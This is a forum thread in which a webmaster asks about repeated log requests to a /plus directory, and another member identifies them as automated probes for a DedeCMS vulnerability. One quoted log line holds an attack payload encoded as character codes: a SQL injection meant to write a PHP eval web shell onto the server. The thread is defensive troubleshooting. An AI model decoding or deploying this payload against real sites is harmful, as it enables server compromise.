Welcome to WebmasterWorld Guest from 34.201.121.213

Forum Moderators: phranque

Message Too Old, No Replies

SSL Error Log messages - "plus" directory

     
5:30 pm on Dec 22, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


Seeking help/information on this SSL error:

[Mon Dec 22 04:59:19 2014] [error] [client xxx.xx.xxx.xxx] File does not exist: /home/domains/xxx.com/webroot/plus

What is with the "plus" directory calls? I have seen a lot of these.
7:35 am on Dec 23, 2014 (gmt 0)

Senior Member from KZ 

WebmasterWorld Senior Member lammert is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 10, 2005
posts: 2951
votes: 33


I haven't seen that error message before. Is the client IP in the log file an address of a known computer, or are they random?
8:37 am on Dec 23, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


It looks like it may be some sort of script. Trace goes to China on some, others Australia. There will be calls from the same IP maybe 4 times within a minute, then 4 or 5 more a few minutes later.

In the ssl_request_log the IPs do a call for (example):

[22/Dec/2014:09:16:07 -0600] xx.xxx.xx.xx TLSv1 DES-CBC3-SHA "GET /plus/mytag_js.php?aid=19015 HTTP/1.1" 12010

and:

[22/Dec/2014:10:10:15 -0600] xx.xxx.xx.xx TLSv1 DES-CBC3-SHA "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=53&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=55&arrs2[]=120&arrs2[]=117&arrs2[]=101&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=101&arrs2[]=55&arrs2[]=120&arrs2[]=117&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=119&arrs2[]=119&arrs2[]=119&arrs2[]=46&arrs2[]=101&arrs2[]=55&arrs2[]=120&arrs2[]=117&arrs2[]=101&arrs2[]=46&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 HTTP/1.1" 12010

Just installed SSL last week and was doing some log checks and wondered what it is. Script kiddies? Scraper?
9:37 am on Dec 23, 2014 (gmt 0)

Senior Member from KZ 

WebmasterWorld Senior Member lammert is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 10, 2005
posts: 2951
votes: 33


These probes are looking for a known exploit in the DedeCMS website package. As your site doesn't have a /plus directory you are not using DedeCMS and therefore are not vulnerable for this specific attack. DedeCMS is a Chinese CMS package and used in a number of Asian countries which may be the reason that most of your attacks seem to come from the Asia-Pacific region.
12:34 pm on Dec 23, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


Thanks! I appreciate the answer!

Marc

PS: I should have put the long string in BBCode's "code" so it wouldn't spread the thread. Tried to edit but I assume it's past the time allowed for an edit. My bad. Sorry about that.
12:51 pm on Dec 23, 2014 (gmt 0)

Senior Member from KZ 

WebmasterWorld Senior Member lammert is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 10, 2005
posts: 2951
votes: 33


Your post wraps correctly in IE 11, but it looks awkward in Chrome. It might be able to fix this with a CSS change. I filed a bug report about your post to the admins, maybe they can use that post to come up with a permanent solution for wrapping of long lines.
1:15 pm on Dec 23, 2014 (gmt 0)

Senior Member from FR 

WebmasterWorld Senior Member leosghost is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Feb 15, 2004
posts:7139
votes: 412


String also "wraps" OK in FF28 on linux ..maybe just a chrome "bug" ( I mean chrome "thing" ) ?
3:54 pm on Dec 23, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


To clarify - I'm on OS X and was viewing in Safari. Just checked in Firefox and it wraps correctly. In Chrome it "sorta" wraps. Opera doesn't handle it well either.